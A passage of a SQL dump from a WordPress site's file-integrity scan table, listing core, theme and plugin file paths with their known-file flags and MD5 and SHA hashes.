(0x05fa93b0837666401e0f49ae3c96566c, 'wp-content/plugins/revslider/admin/assets/js/admin.js', 0, 0x415755ff3826f9e5e94ab21abc2717b6, 0x415755ff3826f9e5e94ab21abc2717b6, 0x0af5d463e7eb90af7a4b37807dfa47cc48ce0a452adb4475039344dee13f462d, '', 0, '?'),
(0x05fe07bd50c8441faf924334c1a3219c, 'wp-content/plugins/us-header-builder/us-header-builder.php', 0, 0xd1d70676c0f6a769e64a2966c965e469, 0xd1d70676c0f6a769e64a2966c965e469, 0xf4ff22ab4f160d6a98e7ace0de6fe4f84233be45354f0759510fa620a599048d, '', 0, '?'),
(0x0611c3174518de2958add84033ca3157, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_with_24px.svg', 0, 0x5f730c02b6facbf30e5bc82d2b146630, 0x5f730c02b6facbf30e5bc82d2b146630, 0x7673e5990e37059091b7ee65c15915ba1997a15ab33cdd0bc3fd805c7fe40254, '', 0, '?'),
(0x0612186d11c971506f4430e22acdd84c, 'wp-content/plugins/wordfence/lib/wfRESTAPI.php', 1, 0x00000000000000000000000000000000, 0xc45c38f7d31fc348c120856d690cfc2b, 0x2b9b872bf9c69faded1dfc30d1fbae1c06cd8262bd3dfeff18b85be39c8194b8, '', 0, '?'),
(0x061f7086314b4db32cf372e8089bc74e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pets_24px.svg', 0, 0x38154d05caa8aee621e747741a8c7050, 0x38154d05caa8aee621e747741a8c7050, 0x7c5fe3ec6d20ea1e2d99b0c30465f71c853955eb51a9fee2776945ee52dbad2e, '', 0, '?'),
(0x0620fb2c654fa29acb7a8f82c3911195, 'wp-includes/customize/class-wp-customize-site-icon-control.php', 1, 0x00000000000000000000000000000000, 0x0570bd6e8e73ac9d78cc8845b7524c97, 0x9ef07a9a123f7e0b72a3588b9f7426f81fb3226dd0c5c93ec455112932ff50f2, '', 0, '?'),
(0x062c1435cd5870cc42466463926a2b94, 'wp-includes/js/dist/vendor/lodash.min.js', 1, 0x00000000000000000000000000000000, 0xbc0594c54450e8ac689739b6b198067a, 0x5bf7974c338ad85932521525a2ac0a244a62b0129ba1ec64c4b35135e2ff49c4, '', 0, '?'),
(0x062c902121e9c5f4694d294e6226abe0, 'wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls_tab.tpl.php', 0, 0xec4692aedbc02d9d27a947073183395e, 0xec4692aedbc02d9d27a947073183395e, 0x7dd64bd229548fec524b05000558ddfb28a54757d082ec399c0ce182a3e2d10e, '', 0, '?'),
(0x063aba998536c74c10159e15344c6dcd, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_bold_24px.svg', 0, 0x86edb71c7cc79fb21e58bbe74e623e04, 0x86edb71c7cc79fb21e58bbe74e623e04, 0xb078b6026c7703c76debcc9b3910968b90ed04b27aa2fcfb6d5782cf38e81da0, '', 0, '?'),
(0x063b2223c0ae404283a7499a7900e169, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_off_24px.svg', 0, 0x32265cb84764d8a15ef31d22e436c624, 0x32265cb84764d8a15ef31d22e436c624, 0x7871ede2131db2351ba5db0e34c14fb0e86c5a21a5b4ff16341a7f9dae98c536, '', 0, '?'),
(0x0651a120b7d4283bd8a07c7e5238bf62, 'wp-admin/includes/user.php', 1, 0x00000000000000000000000000000000, 0xc97088fa06032b0ffe7b7e5563592f7a, 0x1892c1944e602a2766fba88c26cd67d4c669eef860bcb643d0ac7baea18bdc51, '', 0, '?'),
(0x0654b45d5c67f8aff634c5ba7550b23b, 'wp-admin/css/admin-menu-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x5ea1958d0718eca4ff1a039e3390764e, 0xefc967c4a739355cff7db5e70cdd0f87a2bd42b5f64df0d14a7b0f7a9ff5449a, '', 0, '?'),
(0x0658b8c5f9a18d854bef3eb60629b254, 'wp-content/plugins/revslider/admin/assets/imports/twitter-feed/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x066056e8f219f3cfff4e8b1f1cb872b7, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist.svg', 0, 0xcc0cebb06b8616247d01fd4e672d15a3, 0xcc0cebb06b8616247d01fd4e672d15a3, 0xc48bee5ae5d1e72061a11f042796b48749885ed9678578d8d42bad9a3fc03d9c, '', 0, '?'),
(0x0662ef0ea79270b041b02bd42d2bca89, 'wp-admin/js/widgets/text-widgets.min.js', 1, 0x00000000000000000000000000000000, 0x2fb0dbe77a00686b5e5b3fd2f3a7858f, 0x62b6999b28ec2dad7b4754a2574ab025054fa12369544f650c68549f69338c3c, '', 0, '?'),
(0x0664b3eaed666719d70ad94a5f53486c, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character06.svg', 0, 0xcc6aebfe06084357a6e00537bd502e55, 0xcc6aebfe06084357a6e00537bd502e55, 0x76a583efb228799d8c01be9f0480b82937ca57a581922f3fbf25e0968a6e8f7e, '', 0, '?'),
(0x066e265b460f94dc845e84ebfdc9cd5f, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/box.svg', 0, 0x459b94f0c383cd410f167aa905717c66, 0x459b94f0c383cd410f167aa905717c66, 0x91c2676aa8ebc5a686567c65371e630b0034a87ef8e224882570ab2416eb90b6, '', 0, '?'),
(0x068f7fb6a97df226e62a0dab7763d4c2, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_24px.svg', 0, 0xb096f0da76cb90cda6463183c7383f10, 0xb096f0da76cb90cda6463183c7383f10, 0xc9a7624ebd3dcd2ccb67ea3872f609284dab8da2586a4f8fe541e360738fc013, '', 0, '?'),
(0x069397ac256251f1a3931b624d3cd678, 'wp-includes/js/imgareaselect/border-anim-h.gif', 1, 0x00000000000000000000000000000000, 0x5ac3c42cc86e745a5e36b67b4c70a134, 0x7173df63a9ccf5689acde06d2dfa25ea78a81a420299ec78df1f27eae385453a, '', 0, '?'),
(0x06992d3694597740bd690faeeba3c13d, 'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php', 1, 0x00000000000000000000000000000000, 0xcf4f68e6d9dac51c804f3c46d2acc610, 0x508e4a14e7be48b7aff174994e7319bffb6e642a4688275757cd611071fdf45d, '', 0, '?'),
(0x069f14e3d1116c6b90f3dce1d22b8693, 'wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_add_alert_24px.svg', 0, 0xef94b574e2adc78c82a082726f59296d, 0xef94b574e2adc78c82a082726f59296d, 0x428fed5c2bce99d1ed3a5bb0144d38e7d6fc620c58b7f7800df1929ac1912a59, '', 0, '?'),
(0x06a00b2e41df4725c799bf426455030e, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_fixed_24px.svg', 0, 0x93f3a8477e2935b36feab1c42167c0c3, 0x93f3a8477e2935b36feab1c42167c0c3, 0xac573fda93b82db54a1841c905f6c4e55608dba95453c160846fdf7b2ba51587, '', 0, '?'),
(0x06a9b8a519130c302c58e8ad02db059d, 'wp-includes/css/dist/edit-post/style-rtl.css', 1, 0x00000000000000000000000000000000, 0xed723421685d554887d928897ba9ca45, 0xbb74623caec50f6012e1a9dd7a0a252af5969a76a691e6ed40b3d82d038fa761, '', 0, '?'),
(0x06ade6e0df8425c2cf53d589b1bcd730, 'wp-content/plugins/js_composer/include/autoload/params/vc_grid_item.php', 0, 0xb6b2c72b59a084560766e60a9b0f2d42, 0xb6b2c72b59a084560766e60a9b0f2d42, 0xdb14db3e5f79b37066d4e545a02c3153f032ae070d8cc7bfdc4e6f461d24bc54, '', 0, '?'),
(0x06b939c4a5aa7f3ad891b041e90275c0, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_sort_by_alpha_24px.svg', 0, 0x2b974df56ffa2513a67c03eb66699a87, 0x2b974df56ffa2513a67c03eb66699a87, 0x197ea7ec08b67889d50cd8b4ab7b1278de883e8f36a6d8baa36e0f3e3245816f, '', 0, '?'),
(0x06d1a79b045f8334156121a246a401f1, 'wp-admin/css/ie.min.css', 1, 0x00000000000000000000000000000000, 0x76ca02b48506b7c718e88c0b1d1cee08, 0xfc8f06d7861b64c5aa432a866b5dac30c9be0f2280e0fee2cdb623384be5aec4, '', 0, '?'),
(0x06d552b2e678ed493a54baec2b6d3e2b, 'wp-content/plugins/revslider/admin/assets/imports/newsletter-hero/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x06d78c5adba5453fb40f6caa7732e901, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pin.svg', 0, 0x5ad3c703d751434a8207be3a38b5fdb8, 0x5ad3c703d751434a8207be3a38b5fdb8, 0x1d2d49a72999363f7559913dd5f75b6f1391fe1c53baa7ffae1284ac449b0c7a, '', 0, '?'),
(0x06daef49cc5efa025025f795429c94e5, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/snap-svg.js', 0, 0xe3c5db633b2d3813aad5733b2b4091a6, 0xe3c5db633b2d3813aad5733b2b4091a6, 0x59a599564fcc9b87da25dd66d19b68115ff14667a8c14947160dd586b809263b, '', 0, '?'),
(0x06e8644fcdac496333de15d8aa77a982, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Google_Maps.php', 0, 0x5985b3dd396336deb779411fdf5bc2f1, 0x5985b3dd396336deb779411fdf5bc2f1, 0x394c85f4900409233e41ff6bcf2ea9bf6e39fd03a74531de6fcf131892d3a000, '', 0, '?'),
(0x06fcab6929331633dca5d1c773da2a17, 'wp-admin/includes/class-wp-ms-users-list-table.php', 1, 0x00000000000000000000000000000000, 0xda0e835f0d1bac8085469cafa61cb677, 0x287898e0f58f11eb97abbf886c4add5986614376b664ceef52c17a04408fc01e, '', 0, '?'),
(0x06fd222623537d918a66551e14139977, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_composite_24px.svg', 0, 0x877104c560b9ff795f2d4b0f63cc5cb7, 0x877104c560b9ff795f2d4b0f63cc5cb7, 0x76412d0fa5046953bd66f3db45d7245966b3e6b57ba89f0eb782a4327fedeeae, '', 0, '?'),
(0x0701c7602b6ace7f7e5f333abb6a62d6, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_24px.svg', 0, 0x45e6d868578cd7eb1961011ae1a22c8c, 0x45e6d868578cd7eb1961011ae1a22c8c, 0xca21327cf3a5d8883d4fca8c58770ec7840e0f9995351ecb3ad7375dcf54dc89, '', 0, '?'),
(0x0701d9106bfaddc6b84aff339e504b34, 'wp-content/plugins/revslider/admin/views/templates/template-slider-selector.php', 0, 0x3267ea1902502619aba26f8b2c7820d9, 0x3267ea1902502619aba26f8b2c7820d9, 0x8488b604b377f13b57243f26893a689797d13a4f86ad0ec32d1ec96291dcb5ec, '', 0, '?'),
(0x070d508116f7299e345f22bb99270131, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php', 1, 0x00000000000000000000000000000000, 0x0acf85094c3f93ebf5d53012ca36b543, 0x2793f42dc84f7f93bf9b5222c4ebb3164e159814786e08167f7e6c3ca65702ba, '', 0, '?'),
(0x071751baf3e7d442e42589cad4fdc6e1, 'wp-content/themes/Impreza/header.php', 0, 0x26f8869574979646d4e5f26dbc869d25, 0x26f8869574979646d4e5f26dbc869d25, 0xc3ca78e95d4b03fafd450677572ab730a4751d1634e65d8f6373a7dea054b410, '', 0, '?'),
(0x071b33b374ed2e74a7b60edb884d2048, 'wp-content/themes/Impreza/framework/widgets/us_socials.php', 0, 0xf3e297dee434fd2dc87044a44541f3ae, 0xf3e297dee434fd2dc87044a44541f3ae, 0xe595d79e9a1d7023ee6a3c10c91e1d0248d6998fca1328a7540f20e9b1ee2eda, '', 0, '?'),
(0x0728a81102d4bdd67044ab3ec336f638, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/headings.js', 0, 0xec347eb5d71197334fffdd5767ac9af0, 0xec347eb5d71197334fffdd5767ac9af0, 0x454c1c2e9a425be85f033ad8e2bcc262b8adad77aa94c27bdaad2ff10fae08eb, '', 0, '?'),
(0x07519d74bba2debfefb307cfceacc7bf, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_radio_24px.svg', 0, 0x472f57d8c2c314587d397fd5f37d2181, 0x472f57d8c2c314587d397fd5f37d2181, 0x37da572c21579071ad951b8cb4d2060b76af6064037d8a65826629bd94f62c64, '', 0, '?'),
(0x0752774c5b657a3cfb88e35b92e7e402, 'wp-content/plugins/Ultimate_VC_Addons/admin/fonts/opn.svg', 0, 0x0e05524e3f528b778e0fc2d56f6fdb93, 0x0e05524e3f528b778e0fc2d56f6fdb93, 0xb00ff22e27896080c3f1bce2f8034ac37e165507415e033641d5c4f8e4a00828, '', 0, '?'),
(0x076fe6e0f1096c18d108d1b4c6016364, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php', 1, 0x00000000000000000000000000000000, 0xe6d7f80ab0c018a4404c6a87774401ea, 0x0daf380ffa64b3a09f87b2f01cd7381573da87aace18ee36a0e8460cfac88ccf, '', 0, '?'),
(0x0775e767aae2212791a0fb30b57798b8, 'wp-content/plugins/wordfence/css/wf-ionicons.1579191227.css', 1, 0x00000000000000000000000000000000, 0x416c14a1b0738fdcca6ac0e2af831b7f, 0xd79296f09d930834cccbaec07604a812f9e308c1894de68e609756f7ebfd5af4, '', 0, '?'),
(0x077a21b28d216a81a24fa8c651d1aeaf, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_basket_24px.svg', 0, 0x04b76d5c6926555250276022472ff41f, 0x04b76d5c6926555250276022472ff41f, 0xb08025de8c69b752390eff778c3d5c60966fbf350d000e2d7e10bd6d19ed5bcb, '', 0, '?'),
(0x079247a119472228bc642986fad7bf5d, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_24px.svg', 0, 0xa1f5448f5b6645c182382e3bf43a53bc, 0xa1f5448f5b6645c182382e3bf43a53bc, 0x5e7362b6ddaac7a8215e4af3d447289925ca7e967de7fb3df71c092d70b768af, '', 0, '?'),
(0x0797e33114cb45040f5602d8da6fc345, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_work_24px.svg', 0, 0x771956649f92e17fde7543140f7a396c, 0x771956649f92e17fde7543140f7a396c, 0x9deb7dd1e05befa3fdff6d0037e87610a35a87a6c0cf9345e5d27ca0a8cf254e, '', 0, '?'),
(0x079e78c3c27c73be83c4d74b039f61f5, 'wp-content/plugins/wordfence/views/common/page-help.php', 1, 0x00000000000000000000000000000000, 0xe232d46fd6c4005823eb96381533947e, 0x8bd9248e3e88f4d70a1a5796c808294f9c0bd200b88383b3280ad9ddaee90038, '', 0, '?'),
(0x07a706c4f20dc01b11918c69178d2a5c, 'wp-content/plugins/revslider/public/assets/assets/svg/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x07b6fafb7185fc06e85b5cb3237941d2, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/hotspot.min.js', 0, 0x8350bf8bfb2b6676285a027eacecbd74, 0x8350bf8bfb2b6676285a027eacecbd74, 0xb778eca4c28ac6b5c6c8819595565bdc2d7b258bbf5f686b827f69d968c82287, '', 0, '?'),
(0x07bdbd9323ad90f9db15093e1cfb0437, 'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png', 1, 0x00000000000000000000000000000000, 0xe449e3da6dc51f85fc4c571179dd9348, 0x169d0d666cf4d5a42fe53b6c5ce4e2055c2e3608828e72c723509c195bd3c1d9, '', 0, '?'),
(0x07bf51cc93a0d4981e17d7b45a40e10e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_data_setting_24px.svg', 0, 0x5836545844ec7e02d67bc4b2bf208c70, 0x5836545844ec7e02d67bc4b2bf208c70, 0x1d23c3c106b3a71fcd46a6a50f42cb84caa0d068ba4ee413f5d1a80b2d20383e, '', 0, '?'),
(0x07c5864ca547b6c05028edce89c3c8af, 'wp-admin/js/widgets/media-widgets.js', 1, 0x00000000000000000000000000000000, 0x8b85ef7b2e2dc7be48e62ef794142ffc, 0x118055608bfdfa85862c8c52849d62e231e570e46f38f165f2b55d2abfb6e7c2, '', 0, '?'),
(0x07de26d10941c248daec29a5492682f4, 'wp-includes/js/dist/vendor/moment.js', 1, 0x00000000000000000000000000000000, 0x6722aa945b6577eda74330383105557f, 0xef93799fad6e5824c092229a2c446365b4167e06c839631624f187d9ce108df3, '', 0, '?'),
(0x07e2eccd79c9fe16b773cf34db81e786, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ru_RU.mo', 1, 0x00000000000000000000000000000000, 0xbcae00e59b05394b55a563d7bad3aad7, 0xe9cface6dc7e259b000e9ef326fda2f4304b846ccf65c8aab0cc490594c1ac17, '', 0, '?'),
(0x07f263598446b6ea9edf7de56a60bdb6, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php', 1, 0x00000000000000000000000000000000, 0x33828df191fdeb92620728e6b58fd09a, 0x6e3b883c0cd91eb109c795b02d57d5137493f95dce12c13c91731cb0ead675a1, '', 0, '?'),
(0x080039951510f54d29c1b3a7ec885ed2, 'wp-content/plugins/js_composer/include/params/loop/loop.php', 0, 0x823121a6f281d854074a33dbb77b92df, 0x823121a6f281d854074a33dbb77b92df, 0xfa46b4d387947ea99aa111329b1bb51a530f0d549ff68bbd5e3da8320b44ab92, '', 0, '?'),
(0x081cfd1376a5e17511763c7fec23e89f, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_convenience_store_24px.svg', 0, 0xf9f1e42ae3009de10208f81cac8244f5, 0xf9f1e42ae3009de10208f81cac8244f5, 0xd087b484235c397396b55e4dee6b207c49a70cbce724c68347cdca5bf00d38c8, '', 0, '?'),
(0x0823e637b5ed0372c9591fd000bce169, 'wp-content/plugins/wordfence/views/common/status-tooltip.php', 1, 0x00000000000000000000000000000000, 0x25650da97f46649ce7f645050f307342, 0x25fd4dcde6627511e0ce49d15d92a11843ed49e30aa936800cca7a7dfeee4234, '', 0, '?'),
(0x082623d90570aa4aa3a868901913e104, 'wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php', 1, 0x00000000000000000000000000000000, 0xa02c49f7931c7330773451a4131794fa, 0x45d4ffffc52276902bbd8f9df3b4848ff86283fc6ffc9e7db58678617b3a4045, '', 0, '?'),
(0x082c1c2123519683509d5b3bba959bc4, 'wp-includes/sodium_compat/lib/sodium_compat.php', 1, 0x00000000000000000000000000000000, 0xe21f41ce2749359a86784ece248f14a5, 0xb16dfda3db14c63cfbba0970972874295037f8c472827e5efae7e997a6f293c4, '', 0, '?'),
(0x0834aedadb81a503913bbb308a2e2a1c, 'wp-content/plugins/wordfence/views/blocking/country-modal.php', 1, 0x00000000000000000000000000000000, 0x2d055e4183903f1da4061df6b69b1d1b, 0x18b26178af1c97523bc6fe1c2c27984b8999a5e9afe63f51d9d8dfa68a48cfd1, '', 0, '?'),
(0x083aebadb2151463e087d75250650b28, 'wp-includes/rest-api/class-wp-rest-server.php', 1, 0x00000000000000000000000000000000, 0x7411bd52e20e1e87fe7a85350857fe4b, 0xa1f87f8f60ec85d357655ec21b57fdc672d4fc5da0b21a2131e2c3ea5361fe40, '', 0, '?'),
(0x084121390c02cb041b6946f491b91070, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_downward_24px.svg', 0, 0x8510dbdc5ad10f6db329202d21419f81, 0x8510dbdc5ad10f6db329202d21419f81, 0x5150644af2d777e17fde732ac16a5ac7e7916cbf7d5bf609e775f37f93225abd, '', 0, '?'),
(0x0852a2a4f606b5927ad2bb841828351a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fax.svg', 0, 0x2e222313079c70f119a7f5c0409b8bf1, 0x2e222313079c70f119a7f5c0409b8bf1, 0x5ce994d6d84cc00f59c92a89f96362edfea8394d051239e7179df6cc05d3a433, '', 0, '?'),
(0x0852e7b09cc74ca349439446e5ce418b, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_CountDown.php', 0, 0x000d181483cd6d6c66e996e64072ab0e, 0x000d181483cd6d6c66e996e64072ab0e, 0xe7cc96053bd3fa6d4e168b05d8e5063692b6579947cc9682a2b20ea03d979402, '', 0, '?'),
(0x0865d89ff776a48b14e3e7acaa8b456a, 'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php', 1, 0x00000000000000000000000000000000, 0x86d5d82f945d4c2f4762e8a9eb99fd3b, 0x24790d0a70c875a0e4203f411eff3808e9f510dcff4bce999fdc548763845661, '', 0, '?'),
(0x086b001ac19ae181197b0320dd9b36f1, 'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php', 1, 0x00000000000000000000000000000000, 0xbd4eacc8d3a60c9b9ffd8120db87d815, 0x6a8aa3eb4c64e776884516d232d2e6efd59c015c1a63234209e16681cebcff5f, '', 0, '?'),
(0x086b981591b203d0126285c967538819, 'wp-includes/js/tinymce/plugins/wplink/plugin.js', 1, 0x00000000000000000000000000000000, 0xa057a76f743909bce2a9e2f43b888e22, 0x37f867369413bf44195026b1751065d09d2dfa9b283dc21195fdc8f765fdf9dd, '', 0, '?'),
(0x087a8035aad23c76b63844e8dab24b36, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tie.svg', 0, 0xed5e66c9a2054d6b849de0713eba2b8a, 0xed5e66c9a2054d6b849de0713eba2b8a, 0x77d964f995ee2d4802aa4f9f88de884f60d19529fbafeeaaafeff95cf3e568b7, '', 0, '?'),
(0x089f13fa834ce2d42e8f0ade01773b5b, 'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php', 1, 0x00000000000000000000000000000000, 0x671c96f1d5ec230614edfbbb405873c2, 0x97c4aa4e32ef88171c39a1eb57b54457b01bae4f9230d1bd066d47c6ec4ee3ba, '', 0, '?'),
(0x08a5f65f0517741dc0ce242be212294a, 'wp-content/plugins/revslider/admin/views/navigation-editor.php', 0, 0x70c4217b6612003ce75666db63992bdd, 0x70c4217b6612003ce75666db63992bdd, 0x138c7d8028a0270982973a7ac3913b3218544267c2fc6c1229674d2b8aab2a06, '', 0, '?'),
(0x08a6b196eb67847ed2771a11d0056868, 'wp-admin/css/themes-rtl.css', 1, 0x00000000000000000000000000000000, 0x1c7c4b87a701db41ce0aabd9588d8c17, 0xec39a33f18423e8a48b60dd04810be2bef6c9d178ddab9c729e966d191b226c3, '', 0, '?'),
(0x08ad481f4d078e857c1404462e297929, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/range-slider.js', 0, 0x6cd5dc784a07fb2c45a33bee76474b49, 0x6cd5dc784a07fb2c45a33bee76474b49, 0x37bf304b7208ef87e26285ed7aa8e333424c8ce9d8652c87cb7f6649c565e80e, '', 0, '?'),
(0x08b3d552ae9e8b1fba4a69d54a44133e, 'wp-content/themes/Impreza/framework/shortcodes/us_logos.php', 0, 0x3cfce4004ca14ae8196ed08d4032e431, 0x3cfce4004ca14ae8196ed08d4032e431, 0x021012f0f45d70da11b01b1b85216a88e6d5dbba2f95624cca95e5336c240061, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x08e310cda51f60464acd14f65316b175, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php', 1, 0x00000000000000000000000000000000, 0x4b7a2b55edc1e48f1304c5b828ea355c, 0x383abd916f991d117f49f4392c81eabf3d7a05446b383bd17b417b861a69136a, '', 0, '?'),
(0x08e7e262196d8025b2878adbdaadd6ab, 'wp-includes/Requests/Exception/HTTP/502.php', 1, 0x00000000000000000000000000000000, 0x7cc83a6c80cf7af9d5217b17fb47ff69, 0x150bf12f9288bf7e554a4fa42ec58023b5f245e18bfffa35b42a8a2743c51571, '', 0, '?'),
(0x08ec9436a37e7d70011454ecf8d1cbf1, 'wp-content/plugins/revslider/admin/assets/imports/news-gallery/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x08f4cac0e4d84d54eb7baa6ad499cac8, 'wp-content/plugins/js_composer/include/params/options/options.php', 0, 0x66cc08d9b952e00fbd21ff5f5438a9b7, 0x66cc08d9b952e00fbd21ff5f5438a9b7, 0x7e5ec8792aea5e4be5aed5f177b05da2c3bb6d0c1652efd2c097ead9de5dafa1, '', 0, '?'),
(0x08fa7e1c8f9f4a5c116d2f1a9e66210e, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/SmoothScroll-compatible.min.js', 0, 0xba551933f1c94177895343c2e0387812, 0xba551933f1c94177895343c2e0387812, 0xb373dab1ebc1aaa4f9d5aea77c618de84ebe74d2d417bd1edd066d03f38a74dc, '', 0, '?'),
(0x0906511257afef8c7f887e2dca0064c5, 'wp-includes/class-phpass.php', 1, 0x00000000000000000000000000000000, 0x03191a210ccbea54cb07dedfedb7cc42, 0x5ac3eae1199281479f151b64fc2fa709d1c2f127b0fb9c2aac5579a1f4942859, '', 0, '?'),
(0x09073fb1cfe486e6db0819997199754d, 'wp-includes/js/mediaelement/mediaelementplayer.min.css', 1, 0x00000000000000000000000000000000, 0x239ad0ddef90fbac27dd0697a10db8f4, 0xdb963a386c20ab423f712b36791692c4c4713d359355713a626210dbba38da32, '', 0, '?'),
(0x0907eed4c4a8df5481a8770e1ddf5943, 'wp-content/plugins/js_composer/include/helpers/helpers_factory.php', 0, 0xeff79625745e290efa57dec4b9594a5e, 0xeff79625745e290efa57dec4b9594a5e, 0xc7b9af20626516d8e1c7e2a50d1b76e56bd5c20da1961a477e4b203005586afc, '', 0, '?'),
(0x09156a04e47aef8131a49f653f79781d, 'wp-content/plugins/js_composer/include/templates/pages/vc-settings/default-template-post-type.tpl.php', 0, 0x6c89e1b5bf8f9667a41baad8ad7d6d92, 0x6c89e1b5bf8f9667a41baad8ad7d6d92, 0x65d7f2cf4f38e4ebd638d4c7cf3f581f08009982598de1be14574c2ce04f2b99, '', 0, '?'),
(0x092cb9a92fd595188b21e79b6779fe64, 'wp-includes/js/media-editor.min.js', 1, 0x00000000000000000000000000000000, 0xb4fb4087063ff50d81bedfb48d6ec5db, 0xbbc385f2e646948cb9adf03e69b9e1ff69384ebbfca88c859616dd8c731827b8, '', 0, '?'),
(0x0937acae1df8a6d718ee1de305660960, 'wp-content/plugins/wordfence/images/sort_both.png', 1, 0x00000000000000000000000000000000, 0x9a6486086d09bb38cf66a57cc559ade3, 0x7ec225eff1db898e251f8f858b0e3ef6f5fe88426cb26f8775b74929c8893767, '', 0, '?'),
(0x0947c78f3ca7862441f6839d2e78c762, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/text.php', 0, 0x5b581cf688cbe0d5868a05306490d77f, 0x5b581cf688cbe0d5868a05306490d77f, 0x4f342d3a3e14506ab69143b2e34c66c001781377b9dbfed808b927c0e1175a27, '', 0, '?'),
(0x09503d4e3e8ca862226a3a7e5b517be1, 'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js', 1, 0x00000000000000000000000000000000, 0x06f7aecb5bdfa28739eea0a498d15a81, 0x0c24921e278b8fe88d76aaa120b54437c73748ccefa4c46c5fc1639464ab904e, '', 0, '?'),
(0x0958ce740c5c34764e493582d86acbc2, 'wp-admin/async-upload.php', 1, 0x00000000000000000000000000000000, 0x05dd7c526e8b3b4acb15995ad7db1eb2, 0xbffd8e8e5884426ae6090b57af611cd7d183e38b2a8ff4fb8acaf98ac3b908e2, '', 0, '?'),
(0x0973de1ef778b10bbb4542dbbe68164d, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/tabs-accordion.js', 0, 0xcf640d913a7512aedeb009b6b0d47311, 0xcf640d913a7512aedeb009b6b0d47311, 0x6b71227472b826f8888707cfae368c6a8a28e7e38cfd174ba2829f81a690f057, '', 0, '?'),
(0x09745a7fe5eb604a5f27336cf7a5f91e, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_24px.svg', 0, 0x58d07454c147101f6c4fb795bc95a4bb, 0x58d07454c147101f6c4fb795bc95a4bb, 0x8b146a39125328864c08738b82afe0babe6afe1ca4ad6910fc16b8e9e1d14e18, '', 0, '?'),
(0x098468ee586b25b43ef986c67b4efb42, 'wp-includes/js/dist/viewport.min.js', 1, 0x00000000000000000000000000000000, 0xac4c0b7c50ac3513ccbf3f444f225b94, 0x2eca6b145cd1133b96ce88e0eb5cedef588a5d100609421608bc431c061e92bc, '', 0, '?'),
(0x0986b9664f34cecf81b60f2853b492da, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-preset-panel-editor.php', 0, 0x84879759d41a63de757843d1118ea9e3, 0x84879759d41a63de757843d1118ea9e3, 0x075bfb056ca270db3b69edba7cbb6e5e70881ef5f6af77ee425d2bd56c6267c9, '', 0, '?'),
